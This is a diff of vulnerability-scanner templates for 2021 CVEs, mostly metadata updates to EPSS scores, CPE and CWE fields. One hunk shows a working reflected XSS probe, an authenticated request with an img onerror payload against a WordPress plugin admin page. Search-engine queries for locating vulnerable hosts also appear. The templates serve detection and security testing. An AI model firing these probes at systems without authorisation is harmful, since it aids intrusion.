--- a/http/cves/2021/CVE-2021-24991.yaml
+++ b/http/cves/2021/CVE-2021-24991.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2021-24991
cwe-id: CWE-79
- epss-score: 0.0008
+ epss-score: 0.00069
cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.28575
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml
index 07a91dd33f..1765441b2c 100644
--- a/http/cves/2021/CVE-2021-24997.yaml
+++ b/http/cves/2021/CVE-2021-24997.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-24997
cwe-id: CWE-862
- epss-score: 0.00182
+ epss-score: 0.00213
cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.5851
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml
index 78affafe86..e2a2c8dc98 100644
--- a/http/cves/2021/CVE-2021-25003.yaml
+++ b/http/cves/2021/CVE-2021-25003.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434,CWE-94
- epss-score: 0.69837
+ epss-score: 0.5944
cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97311
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml
index 45361cad91..d61ed36b6b 100644
--- a/http/cves/2021/CVE-2021-25008.yaml
+++ b/http/cves/2021/CVE-2021-25008.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25008
cwe-id: CWE-79
- epss-score: 0.00141
+ epss-score: 0.00106
cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42451
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml
index ccdd504e1c..8faeb91217 100644
--- a/http/cves/2021/CVE-2021-25028.yaml
+++ b/http/cves/2021/CVE-2021-25028.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25028
cwe-id: CWE-601
- epss-score: 0.00141
+ epss-score: 0.00106
cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42451
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml
index b8f77a9ac4..fa7d40f5d9 100644
--- a/http/cves/2021/CVE-2021-25033.yaml
+++ b/http/cves/2021/CVE-2021-25033.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25033
cwe-id: CWE-601
- epss-score: 0.00112
+ epss-score: 0.00115
cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44376
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml
index 1f752e9bb3..5f60899236 100644
--- a/http/cves/2021/CVE-2021-25052.yaml
+++ b/http/cves/2021/CVE-2021-25052.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25052
cwe-id: CWE-352
- epss-score: 0.01063
+ epss-score: 0.01231
cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.83713
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml
index 9ad3e2d608..35b433c37f 100644
--- a/http/cves/2021/CVE-2021-25055.yaml
+++ b/http/cves/2021/CVE-2021-25055.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25055
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml
index 56eec6aa42..81fff17679 100644
--- a/http/cves/2021/CVE-2021-25063.yaml
+++ b/http/cves/2021/CVE-2021-25063.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25063
cwe-id: CWE-79
- epss-score: 0.00141
+ epss-score: 0.00106
cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42451
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml
index 2bc4a040e7..6dd3a81fb5 100644
--- a/http/cves/2021/CVE-2021-25065.yaml
+++ b/http/cves/2021/CVE-2021-25065.yaml
@@ -6,18 +6,25 @@ info:
severity: medium
description: |
The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
- remediation: Fixed in version 2.19.2
reference:
- https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
- https://wordpress.org/plugins/custom-facebook-feed/
+ remediation: Fixed in version 2.19.2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
+ cve-id: CVE-2021-25065
cwe-id: CWE-79
+ epss-score: 0.00069
+ cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.28379
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
+ framework: wordpress
+ vendor: smashballoon
+ product: smash_balloon_social_post_feed
tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated
http:
@@ -28,7 +35,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1
Host: {{Hostname}}
diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml
index 8a0c8e845d..d04256d314 100644
--- a/http/cves/2021/CVE-2021-25067.yaml
+++ b/http/cves/2021/CVE-2021-25067.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2021-25067
cwe-id: CWE-79
- epss-score: 0.00092
+ epss-score: 0.00069
cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.28379
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml
index 86504a0c42..b2afd31e43 100644
--- a/http/cves/2021/CVE-2021-25074.yaml
+++ b/http/cves/2021/CVE-2021-25074.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25074
cwe-id: CWE-601
- epss-score: 0.00141
+ epss-score: 0.00106
cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42451
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml
index 941965b41c..4cd5abe180 100644
--- a/http/cves/2021/CVE-2021-25075.yaml
+++ b/http/cves/2021/CVE-2021-25075.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-862
epss-score: 0.00094
cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39063
metadata:
max-request: 3
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml
index 8e30c6be87..ce5846ea3e 100644
--- a/http/cves/2021/CVE-2021-25078.yaml
+++ b/http/cves/2021/CVE-2021-25078.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25078
cwe-id: CWE-79
- epss-score: 0.00508
+ epss-score: 0.00382
cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.696
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml
index 1a03bb69ed..35df057f5d 100644
--- a/http/cves/2021/CVE-2021-25085.yaml
+++ b/http/cves/2021/CVE-2021-25085.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25085
cwe-id: CWE-79
- epss-score: 0.00133
+ epss-score: 0.001
cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40521
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml
index 03d9918fea..0939c0e40b 100644
--- a/http/cves/2021/CVE-2021-25099.yaml
+++ b/http/cves/2021/CVE-2021-25099.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25099
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml
index fe4a12b1b4..4adf1731db 100644
--- a/http/cves/2021/CVE-2021-25104.yaml
+++ b/http/cves/2021/CVE-2021-25104.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25104
cwe-id: CWE-79
- epss-score: 0.001
+ epss-score: 0.00119
cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml
index e037542fa4..b889fa84ae 100644
--- a/http/cves/2021/CVE-2021-25111.yaml
+++ b/http/cves/2021/CVE-2021-25111.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25111
cwe-id: CWE-601
- epss-score: 0.00119
+ epss-score: 0.0012
cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45408
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml
index f90bf6e45b..0b072155a3 100644
--- a/http/cves/2021/CVE-2021-25112.yaml
+++ b/http/cves/2021/CVE-2021-25112.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25112
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml
index 83dcf5b6bd..ef7f246b6f 100644
--- a/http/cves/2021/CVE-2021-25114.yaml
+++ b/http/cves/2021/CVE-2021-25114.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-25114
cwe-id: CWE-89
- epss-score: 0.0364
+ epss-score: 0.04575
cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91459
metadata:
max-request: 2
google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml
index 92b91407d1..36245b050c 100644
--- a/http/cves/2021/CVE-2021-25118.yaml
+++ b/http/cves/2021/CVE-2021-25118.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-25118
cwe-id: CWE-200
- epss-score: 0.00174
+ epss-score: 0.00206
cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.57883
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml
index 942af72eb3..3efbd810ac 100644
--- a/http/cves/2021/CVE-2021-25120.yaml
+++ b/http/cves/2021/CVE-2021-25120.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-25120
cwe-id: CWE-79
- epss-score: 0.00119
+ epss-score: 0.0012
cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:*
+ epss-percentile: 0.45408
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml
index 81c683dbc6..84a03c4664 100644
--- a/http/cves/2021/CVE-2021-25281.yaml
+++ b/http/cves/2021/CVE-2021-25281.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-25281
cwe-id: CWE-287
- epss-score: 0.8118
+ epss-score: 0.84879
cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9806
metadata:
max-request: 1
vendor: saltstack
diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml
index c8899a14c9..593f6aafcf 100644
--- a/http/cves/2021/CVE-2021-25296.yaml
+++ b/http/cves/2021/CVE-2021-25296.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25296
cwe-id: CWE-78
- epss-score: 0.89267
+ epss-score: 0.89404
cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
+ epss-percentile: 0.98323
metadata:
max-request: 4
shodan-query: title:"Nagios XI"
diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml
index 18f88c3566..3682c6171e 100644
--- a/http/cves/2021/CVE-2021-25297.yaml
+++ b/http/cves/2021/CVE-2021-25297.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25297
cwe-id: CWE-78
- epss-score: 0.89267
+ epss-score: 0.89404
cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
+ epss-percentile: 0.98323
metadata:
max-request: 4
shodan-query: title:"Nagios XI"
diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml
index 2010d31b88..911c29db4c 100644
--- a/http/cves/2021/CVE-2021-25298.yaml
+++ b/http/cves/2021/CVE-2021-25298.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25298
cwe-id: CWE-78
- epss-score: 0.97375
+ epss-score: 0.97378
cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
+ epss-percentile: 0.99861
metadata:
max-request: 4
shodan-query: title:"Nagios XI"
diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml
index 8c4a800740..c019878ad2 100644
--- a/http/cves/2021/CVE-2021-25299.yaml
+++ b/http/cves/2021/CVE-2021-25299.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.96825
cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
+ epss-percentile: 0.99548
metadata:
max-request: 3
shodan-query: title:"Nagios XI"
diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml
index af2bd1ae98..1fc1bb5c1b 100644
--- a/http/cves/2021/CVE-2021-25646.yaml
+++ b/http/cves/2021/CVE-2021-25646.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25646
cwe-id: CWE-732
- epss-score: 0.97431
+ epss-score: 0.97361
cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99843
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml
index b03b5d5639..39c918d6e0 100644
--- a/http/cves/2021/CVE-2021-25864.yaml
+++ b/http/cves/2021/CVE-2021-25864.yaml
@@ -13,14 +13,15 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
- epss-score: 0.55044
- cpe: cpe:2.3:a:node-red-contrib-huemagic_project:node-red-contrib-huemagic:3.0.0:*:*:*:*:node.js:*:*
+ epss-score: 0.53923
+ cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:*
+ epss-percentile: 0.97171
metadata:
max-request: 1
shodan-query: title:"NODE-RED"
framework: node.js
- vendor: node-red-contrib-huemagic_project
- product: node-red-contrib-huemagic
+ vendor: dgtl
+ product: huemagic
tags: cve,cve2021,huemagic,lfi
http:
diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml
index dcc051e4f9..d14b877e43 100644
--- a/http/cves/2021/CVE-2021-25899.yaml
+++ b/http/cves/2021/CVE-2021-25899.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-25899
cwe-id: CWE-89
- epss-score: 0.45931
+ epss-score: 0.54555
cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.97184
metadata:
max-request: 1
shodan-query: html:"AURALL"
diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml
index 8b42721099..4202bc9b4e 100644
--- a/http/cves/2021/CVE-2021-26084.yaml
+++ b/http/cves/2021/CVE-2021-26084.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-26084
- cwe-id: CWE-74
- epss-score: 0.97474
+ cwe-id: CWE-917
+ epss-score: 0.97457
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99929
metadata:
max-request: 13
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml
index a40f689863..2cbb826f2a 100644
--- a/http/cves/2021/CVE-2021-26085.yaml
+++ b/http/cves/2021/CVE-2021-26085.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-26085
- cwe-id: CWE-862
- epss-score: 0.96617
+ cwe-id: CWE-425
+ epss-score: 0.9661
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99455
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml
index 2054a10806..44efe7e67b 100644
--- a/http/cves/2021/CVE-2021-26086.yaml
+++ b/http/cves/2021/CVE-2021-26086.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.94427
cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98891
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml
index 4f1d604e91..87089363fd 100644
--- a/http/cves/2021/CVE-2021-26247.yaml
+++ b/http/cves/2021/CVE-2021-26247.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-26247
cwe-id: CWE-79
- epss-score: 0.00277
+ epss-score: 0.00252
cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:*
+ epss-percentile: 0.62358
metadata:
max-request: 1
vendor: cacti
diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml
index 0bc74b537f..66e141702e 100644
--- a/http/cves/2021/CVE-2021-26295.yaml
+++ b/http/cves/2021/CVE-2021-26295.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-26295
cwe-id: CWE-502
- epss-score: 0.97487
+ epss-score: 0.97456
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99928
metadata:
max-request: 1
shodan-query: "OFBiz.Visitor="
diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml
index a40918111e..949d989ac6 100644
--- a/http/cves/2021/CVE-2021-26475.yaml
+++ b/http/cves/2021/CVE-2021-26475.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00156
cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.51402
metadata:
max-request: 1
vendor: eprints
diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml
index 92fe0008b0..10d602a4c4 100644
--- a/http/cves/2021/CVE-2021-26598.yaml
+++ b/http/cves/2021/CVE-2021-26598.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-26598
cwe-id: CWE-287
- epss-score: 0.00364
+ epss-score: 0.00425
cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71111
metadata:
max-request: 2
shodan-query: http.html:"ImpressCMS"
diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml
index 2e2c8173d1..61b515bbbd 100644
--- a/http/cves/2021/CVE-2021-26702.yaml
+++ b/http/cves/2021/CVE-2021-26702.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00156
cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.51402
metadata:
max-request: 1
vendor: eprints
diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml
index f642290df7..355407b663 100644
--- a/http/cves/2021/CVE-2021-26710.yaml
+++ b/http/cves/2021/CVE-2021-26710.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:*
+ epss-percentile: 0.40934
metadata:
max-request: 1
vendor: redwood
diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml
index c82edcfe1f..f00a9d1da2 100644
--- a/http/cves/2021/CVE-2021-26723.yaml
+++ b/http/cves/2021/CVE-2021-26723.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-26723
cwe-id: CWE-79
- epss-score: 0.05479
+ epss-score: 0.06264
cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9267
metadata:
max-request: 1
vendor: jenzabar
diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml
index b2d46db6e3..98acbe6955 100644
--- a/http/cves/2021/CVE-2021-26812.yaml
+++ b/http/cves/2021/CVE-2021-26812.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00837
cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:*
+ epss-percentile: 0.79912
metadata:
max-request: 1
framework: moodle
diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml
index 509fb22ebe..ac3cc6bfdb 100644
--- a/http/cves/2021/CVE-2021-26855.yaml
+++ b/http/cves/2021/CVE-2021-26855.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-26855
cwe-id: CWE-918
- epss-score: 0.97537
+ epss-score: 0.9751
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
+ epss-percentile: 0.99969
metadata:
max-request: 1
shodan-query: vuln:CVE-2021-26855
diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml
index 5c8f9b7c83..0fd3481471 100644
--- a/http/cves/2021/CVE-2021-27124.yaml
+++ b/http/cves/2021/CVE-2021-27124.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-27124
cwe-id: CWE-89
- epss-score: 0.02711
+ epss-score: 0.02194
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.88002
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml
index 61155ac8e0..1ff6f6f768 100644
--- a/http/cves/2021/CVE-2021-27132.yaml
+++ b/http/cves/2021/CVE-2021-27132.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-27132
cwe-id: CWE-74
- epss-score: 0.03379
+ epss-score: 0.03662
cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9051
metadata:
max-request: 1
vendor: sercomm
diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml
index ed7bf5330d..bb06bbdad9 100644
--- a/http/cves/2021/CVE-2021-27309.yaml
+++ b/http/cves/2021/CVE-2021-27309.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*
+ epss-percentile: 0.40466
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml
index dc86a662ab..c4e0f82687 100644
--- a/http/cves/2021/CVE-2021-27310.yaml
+++ b/http/cves/2021/CVE-2021-27310.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*
+ epss-percentile: 0.40466
metadata:
max-request: 1
vendor: csphere
diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml
index 3fb844e4ac..e5510b2424 100644
--- a/http/cves/2021/CVE-2021-27314.yaml
+++ b/http/cves/2021/CVE-2021-27314.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-27314
cwe-id: CWE-89
- epss-score: 0.30513
+ epss-score: 0.30796
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.96384
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml
index 7a0edb44ea..c49b1e6128 100644
--- a/http/cves/2021/CVE-2021-27315.yaml
+++ b/http/cves/2021/CVE-2021-27315.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-27315
cwe-id: CWE-89
- epss-score: 0.15962
+ epss-score: 0.10777
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94338
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml
index b80ebd1e21..8b061b13ae 100644
--- a/http/cves/2021/CVE-2021-27316.yaml
+++ b/http/cves/2021/CVE-2021-27316.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-27316
cwe-id: CWE-89
- epss-score: 0.15962
+ epss-score: 0.10777
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94338
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml
index f9dcbaa3f9..a3a11fc09e 100644
--- a/http/cves/2021/CVE-2021-27319.yaml
+++ b/http/cves/2021/CVE-2021-27319.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-27319
cwe-id: CWE-89
- epss-score: 0.15962
+ epss-score: 0.10777
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94338
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml
index adf4d9e425..f908332dea 100644
--- a/http/cves/2021/CVE-2021-27320.yaml
+++ b/http/cves/2021/CVE-2021-27320.yaml
